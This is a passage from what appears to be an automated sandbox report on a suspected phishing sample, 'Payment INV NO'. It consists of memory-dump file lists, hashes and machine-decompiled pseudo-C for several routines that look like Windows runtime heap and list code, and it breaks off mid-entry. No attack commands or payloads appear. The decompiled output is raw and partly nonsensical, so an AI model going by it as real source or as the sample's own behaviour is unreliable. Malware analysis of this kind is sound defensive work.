                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: feb8f6d5c5db69d95014c05ce011b00cacee42ac6dd28109b4113bb0b3132b98
                                                          • Instruction ID: fb4f7b65048fe5e9f114bf2fda281fd323722ec2cdb699dccbcce64901d044ca
                                                          • Opcode Fuzzy Hash: feb8f6d5c5db69d95014c05ce011b00cacee42ac6dd28109b4113bb0b3132b98
                                                          • Instruction Fuzzy Hash: 7E11E576A006589FDB21DFA9D884BAEF7B8FF88700F1404BAFA059B756DA34D940C750
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017A766D Relevance: .1, Instructions: 54COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 94%
                                                          			E017A766D(void* __ecx, signed int __edx, signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16) {
				char _v8;
				void* _t22;
				void* _t24;
				intOrPtr _t29;
				intOrPtr* _t30;
				void* _t42;
				intOrPtr _t47;

				_push(__ecx);
				_t36 =  &_v8;
				if(E017CF3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E017CF3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = E017B4620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                                          0x017a7672
                                                          0x017a767f
                                                          0x017a7689
                                                          0x017a76de
                                                          0x017a76de
                                                          0x017a768b
                                                          0x017a7691
                                                          0x017a7693
                                                          0x017a7697
                                                          0x00000000
                                                          0x017a7699
                                                          0x017a76a8
                                                          0x00000000
                                                          0x017a76aa
                                                          0x017a76ad
                                                          0x017a76b1
                                                          0x00000000
                                                          0x017a76b3
                                                          0x017a76b3
                                                          0x017a76b5
                                                          0x017a76ba
                                                          0x017a76bc
                                                          0x017a76bc
                                                          0x017a76c0
                                                          0x00000000
                                                          0x017a76c2
                                                          0x017a76ce
                                                          0x017a76ce
                                                          0x017a76c0
                                                          0x017a76b1
                                                          0x017a76a8
                                                          0x017a7697
                                                          0x017a76d9

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                          • Instruction ID: 36bcba8ef89a08d927e1132c45644bc8e4daf3fdd48b3e0ab74b665ac789cb33
                                                          • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                                          • Instruction Fuzzy Hash: CD01D432711519ABC7249E5ECC84F5BFBADEBC4B60B680228BA09CB245DA31DC1183A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 01799080 Relevance: .1, Instructions: 53COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 69%
                                                          			E01799080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x18885ec;
				E017B2280(_t48, 0x18885ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E017AFFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x188538c; // 0x771a6828
					if( *_t84 != 0x1885388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x186f6e8);
						E017ED0E8(0x18885ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								L018688F5(_t80, _t85, 0x1885388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x18886c0; // 0x12607b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x18886b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E017B2280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											L018688F5(0x18885ec, _t85, 0x1885388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E017DAFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x188b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x18884c0;
																			if(_t82 >=  *0x18884c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = L01869063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0179922A(_t99);
										_t64 = E017B7D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = L01868B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x18886c0; // 0x12607b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x18886b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x18886bc;
													_t87 = 0x18886b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E01799240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x18886c4;
												_t87 = 0x18886c0;
												L27:
												E017C9B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E017ED130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x1885388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x188538c = _t51;
						goto L6;
					}
				}
			}




















                                                          0x01799082
                                                          0x01799083
                                                          0x01799084
                                                          0x01799085
                                                          0x01799087
                                                          0x01799096
                                                          0x01799098
                                                          0x01799098
                                                          0x0179909e
                                                          0x017990a8
                                                          0x017990e7
                                                          0x017990e7
                                                          0x017990aa
                                                          0x017990b0
                                                          0x017990b7
                                                          0x017990bd
                                                          0x017990dd
                                                          0x017990e6
                                                          0x017990bf
                                                          0x017990bf
                                                          0x017990c7
                                                          0x017990cf
                                                          0x017990f1
                                                          0x017990f2
                                                          0x017990f4
                                                          0x017990f5
                                                          0x017990f6
                                                          0x017990f7
                                                          0x017990f8
                                                          0x017990f9
                                                          0x017990fa
                                                          0x017990fb
                                                          0x017990fc
                                                          0x017990fd
                                                          0x017990fe
                                                          0x017990ff
                                                          0x01799100
                                                          0x01799102
                                                          0x01799107
                                                          0x0179910c
                                                          0x01799110
                                                          0x01799113
                                                          0x01799115
                                                          0x01799136
                                                          0x0179913f
                                                          0x01799143
                                                          0x017f37e4
                                                          0x017f37e4
                                                          0x01799117
                                                          0x01799117
                                                          0x0179911d
                                                          0x00000000
                                                          0x0179911f
                                                          0x0179911f
                                                          0x01799125
                                                          0x00000000
                                                          0x01799127
                                                          0x0179912d
                                                          0x01799130
                                                          0x01799134
                                                          0x01799158
                                                          0x0179915d
                                                          0x01799161
                                                          0x01799168
                                                          0x017f3715
                                                          0x0179916e
                                                          0x0179916e
                                                          0x01799175
                                                          0x01799177
                                                          0x0179917e
                                                          0x0179917f
                                                          0x01799182
                                                          0x01799182
                                                          0x01799187
                                                          0x01799187
                                                          0x0179918a
                                                          0x0179918d
                                                          0x0179918f
                                                          0x01799192
                                                          0x01799195
                                                          0x01799198
                                                          0x01799198
                                                          0x01799198
                                                          0x0179919a
                                                          0x00000000
                                                          0x00000000
                                                          0x017f371f
                                                          0x017f3721
                                                          0x017f3727
                                                          0x017f372f
                                                          0x017f3733
                                                          0x017f3735
                                                          0x017f3738
                                                          0x017f373b
                                                          0x017f373d
                                                          0x017f3740
                                                          0x00000000
                                                          0x017f3746
                                                          0x017f3746
                                                          0x017f3749
                                                          0x00000000
                                                          0x017f374f
                                                          0x017f374f
                                                          0x017f3751
                                                          0x017f3757
                                                          0x017f3759
                                                          0x017f375c
                                                          0x017f375c
                                                          0x017f375e
                                                          0x017f375e
                                                          0x017f3761
                                                          0x017f3764
                                                          0x00000000
                                                          0x00000000
                                                          0x017f3766
                                                          0x017f3768
                                                          0x017f37a3
                                                          0x017f37a3
                                                          0x017f37a5
                                                          0x017f37a7
                                                          0x017f37ad
                                                          0x017f37b0
                                                          0x017f37b2
                                                          0x017f37bc
                                                          0x017f37c2
                                                          0x017f37c2
                                                          0x017f37b2
                                                          0x01799187
                                                          0x01799187
                                                          0x0179918a
                                                          0x0179918d
                                                          0x0179918f
                                                          0x01799192
                                                          0x01799195
                                                          0x00000000
                                                          0x01799195
                                                          0x00000000
                                                          0x017f376a
                                                          0x017f376a
                                                          0x017f376a
                                                          0x017f376c
                                                          0x017f376c
                                                          0x017f376f
                                                          0x017f3775
                                                          0x00000000
                                                          0x00000000
                                                          0x017f3777
                                                          0x017f3779
                                                          0x017f3782
                                                          0x017f3787
                                                          0x017f3789
                                                          0x017f3790
                                                          0x017f3790
                                                          0x017f378b
                                                          0x017f378b
                                                          0x017f378b
                                                          0x017f3792
                                                          0x017f3795
                                                          0x00000000
                                                          0x017f3795
                                                          0x00000000
                                                          0x017f3779
                                                          0x017f3798
                                                          0x00000000
                                                          0x017f3798
                                                          0x00000000
                                                          0x017f3768
                                                          0x017f379b
                                                          0x017f379b
                                                          0x017f3751
                                                          0x017f3749
                                                          0x00000000
                                                          0x017f3740
                                                          0x017991a0
                                                          0x017991a3
                                                          0x017991a9
                                                          0x017991b0
                                                          0x00000000
                                                          0x017991b0
                                                          0x01799187
                                                          0x017991b4
                                                          0x017991b4
                                                          0x017991bb
                                                          0x017991c0
                                                          0x017991c5
                                                          0x017991c7
                                                          0x017f37da
                                                          0x017991cd
                                                          0x017991cd
                                                          0x017991cd
                                                          0x017991d2
                                                          0x017991d5
                                                          0x01799239
                                                          0x01799239
                                                          0x017991d7
                                                          0x017991db
                                                          0x017991e1
                                                          0x017991e7
                                                          0x017991fd
                                                          0x01799203
                                                          0x0179921e
                                                          0x01799223
                                                          0x00000000
                                                          0x01799205
                                                          0x01799205
                                                          0x01799208
                                                          0x0179920c
                                                          0x01799214
                                                          0x01799214
                                                          0x0179920c
                                                          0x017991e9
                                                          0x017991e9
                                                          0x017991ee
                                                          0x017991f3
                                                          0x017991f3
                                                          0x017991f3
                                                          0x017991e7
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x01799134
                                                          0x01799125
                                                          0x0179911d
                                                          0x0179914e
                                                          0x017990d1
                                                          0x017990d1
                                                          0x017990d3
                                                          0x017990d6
                                                          0x017990d8
                                                          0x00000000
                                                          0x017990d8
                                                          0x017990cf

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5c1f78b47f5c07883284a9e2fad87bd283169fbfdcc5cc42c932ae8aa9437e7d
                                                          • Instruction ID: 7bbe7fc540daa4ac834b746294bbca8c814b367c1a2cb99938054b959bc3aca3
                                                          • Opcode Fuzzy Hash: 5c1f78b47f5c07883284a9e2fad87bd283169fbfdcc5cc42c932ae8aa9437e7d
                                                          • Instruction Fuzzy Hash: 5301FF726012068FE7299F0CE844B16FBA9FF82328F21406AE211CB696C370DD41CBA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Function 017C3B5A Relevance: .1, Instructions: 51COMMON
                                                          Download Yara Rule
                                                          C-Code - Quality: 100%
                                                          			E017C3B5A(void* __eax, intOrPtr __ebx, void* __edi, signed char __esi) {
				void* _t14;
				intOrPtr _t15;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t23;
				intOrPtr _t27;
				intOrPtr _t31;
				signed char _t37;
				void* _t39;

				_t37 = __esi;
				_t31 = __ebx;
				_t14 = __eax;
				if( *((intOrPtr*)(_t39 - 0x40)) != __ebx || __edi < 0) {
					if(_t37 == 0) {
						goto L2;
					}
					_t32 =  *((intOrPtr*)(_t39 - 0x24));
					if( *((intOrPtr*)(_t39 - 0x24)) != 0) {
						_t27 =  *0x18884c4; // 0x0
						E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t27 + 0xc0000, _t32);
						_t37 =  *((intOrPtr*)(_t39 - 0x20));
					}
					_t33 =  *((intOrPtr*)(_t37 + 0x1c));
					if( *((intOrPtr*)(_t37 + 0x1c)) != 0) {
						_t23 =  *0x18884c4; // 0x0
						E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t23 + 0xc0000, _t33);
						_t37 =  *((intOrPtr*)(_t39 - 0x20));
					}
					_t34 =  *((intOrPtr*)(_t37 + 0x20));
					if( *((intOrPtr*)(_t37 + 0x20)) != 0) {
						_t19 =  *0x18884c4; // 0x0
						E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t19 + 0xc0000, _t34);
						_t37 =  *((intOrPtr*)(_t39 - 0x20));
					}
					_t15 =  *0x18884c4; // 0x0
					_t18 = E017B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t15 + 0xc0000, _t37);
					 *((intOrPtr*)(_t39 - 0x20)) = _t31;
					return _t18;
				} else {
					L2:
					return _t14;
				}
			}












                                                          0x017c3b5a
                                                          0x017c3b5a
                                                          0x017c3b5a
                                                          0x017c3b5d
                                                          0x018061e6
                                                          0x00000000
                                                          0x00000000
                                                          0x018061ec
                                                          0x018061f1
                                                          0x018061f3
                                                          0x01806208
                                                          0x0180620d
                                                          0x0180620d
                                                          0x01806210
                                                          0x01806215
                                                          0x01806217
                                                          0x0180622c
                                                          0x01806231
                                                          0x01806231
                                                          0x01806234
                                                          0x01806239
                                                          0x0180623b
                                                          0x01806250
                                                          0x01806255
                                                          0x01806255
                                                          0x01806258
                                                          0x0180626d
                                                          0x01806274
                                                          0x00000000
                                                          0x017c3b6b
                                                          0x017c3b6b
                                                          0x017c3b6b
                                                          0x017c3b6b

                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.397327177.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01770000, based on PE: true
                                                          • Associated: 00000004.00000002.397327177.0000000001770000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001776000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000017EC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001809000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001841000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000184B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.0000000001885000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.000000000188B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018AE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018B7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BC000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018BE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C1000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018C6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018D8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DA000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018DD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E3000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          • Associated: 00000004.00000002.397327177.00000000018E5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_1770000_Payment INV NO.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 1b080f20051eb5427769068f141024a3f72076cdfa357995daa2ab2e55cff42a
                                                          • Instruction ID: de73b1e34e5b02618e1c3e4f252ed378c53d303e85657156bf18966c94a28714
